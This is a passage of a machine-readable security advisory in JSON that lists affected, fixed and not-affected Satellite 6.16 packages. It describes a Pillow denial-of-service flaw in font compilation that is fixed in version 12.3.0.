"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pillow: Pillow: Denial of Service via crafted PCF font data"
},
{
"cve": "CVE-2026-54060",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2026-07-06T20:02:29.509113+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2497466"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. When processing a specially crafted font file, the library\u0027s font compilation function does not adequately check for excessive memory allocation. This oversight allows a remote attacker to trigger an unreasonable consumption of system memory, leading to a denial of service (DoS) for the application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: Pillow: Denial of Service via excessive memory allocation when processing font files",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in Pillow prior to version 12.3.0. The FontFile.compile() method in PIL/FontFile.py assembles per-glyph images into a combined bitmap using Image.new() without calling Image._decompression_bomb_check(). This allows a specially crafted font file to trigger excessive memory allocation during conversion or saving, leading to denial of service via resource exhaustion.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64"
],
"known_not_affected": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
